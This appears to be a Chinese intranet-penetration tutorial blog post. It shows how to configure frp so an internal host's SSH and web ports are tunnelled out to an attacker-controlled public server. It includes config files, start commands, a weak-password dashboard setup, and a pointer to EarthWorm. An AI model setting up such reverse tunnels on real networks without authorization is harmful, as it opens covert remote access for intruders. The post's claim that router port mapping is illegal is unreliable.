内网渗透之端口映射

端口映射

生活中的网络正常情况下属于下面这张图的,路由器内的主机访问外界的服务器或其他需要经过路由器,而外界回来的流量也需要经过路由器,如果外界直接访问路由器内的主机是不可能的

image-20241013154214926

除非

image-20241013154819820

我们可以在路由器上做端口映射,使得路由器上的某个端口可以直接映射到内网中某台主机的某个服务端口,使得外界主机可以直接访问。但是!这是违法的,法律严禁搭建私服。

所以我们就需要使用工具(ew或者frp)

image-20241013155844470

一、使用frp进行端口映射
1、SSH服务

(1)在攻击者公网服务器上,配置frps.ini,并使用 ./frps -c ./frps.ini 命令启动

[common]
bind_port = 7000   #frp服务端端口(必须)

后台启动:$ nohup ./frps -c frps.ini &

image-20241013162818087

(2)配置内网客户端frpc.ini

[common]
server_addr = 47.96.116.171       #frp服务端地址,可以填ip或者域名,这里假设为47.96.116.171
server_port = 7000              #frp服务端端口,即填写服务端配置中的 bind_port

[ssh]
type = tcp                      #连接类型,填tcp或udp
local_ip = 127.0.0.1            #填127.0.0.1或内网ip都可以
local_port = 22                 #需要转发到的端口,ssh端口是22
remote_port = 8082              #frp服务端的远程监听端口,即你访问服务端的remote_port就相当于访问客户端的 local_port,如果填0则会随机分配一个端口

以上客户端配置信息表示 内网主机与攻击者服务器的7000端口通信

然后内网主机的 22 号端口 映射到 攻击者服务器的 8082 端口

然后启动客户端

image-20241013164812096

服务器这边就可以看到变化,包括攻击者服务器的出口 socket 对象(ip加port)以及端口映射的代理端口(8082映射到内网主机的某个端口)

image-20241013164736044

(3)在任意其他主机上,使用ssh -p 8082 root@47.96.116.171直接可以访问到内网Linux.

image-20241013165705329

(4)服务器端出口的端口经常在变

image-20241013170054319

2、HTTP服务

(1)在公网服务器上,配置frps.ini,并使用 ./frps -c ./frps.ini 命令启动

[common]bind_port = 7000
vhost_http_port = 8080

(2)在为公网IP配置域名解析

image-20211206050414680

(3)在公网云服务器环境配置防火墙规则

image-20211206050338027

(4)在Windows 2016上启动 frpc.exe -c frpc.ini:

[common]
server_addr = 47.96.116.171
server_port = 7000

[web]
type = http
local_port = 80
custom_domains = frp.matrika.cn

(5)访问域和对应的公网端口,实现了地内网的访问。

3、开启Dashboard

编辑服务器端frps.ini:

[common]
bind_port = 7000
vhost_http_port = 8080
dashboard_port = 8081        # 注意端口要经过公网防火墙配置
dashboard_user = admin
dashboard_pwd = 123456

访问:http://47.96.116.171:8081/static/#/,输入用户名和密码

image-20211206224344715

二、使用EarthWorm进行端口映射

https://baijiahao.baidu.com/s?id=1582377862698089832&wfr=spider&for=pc

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值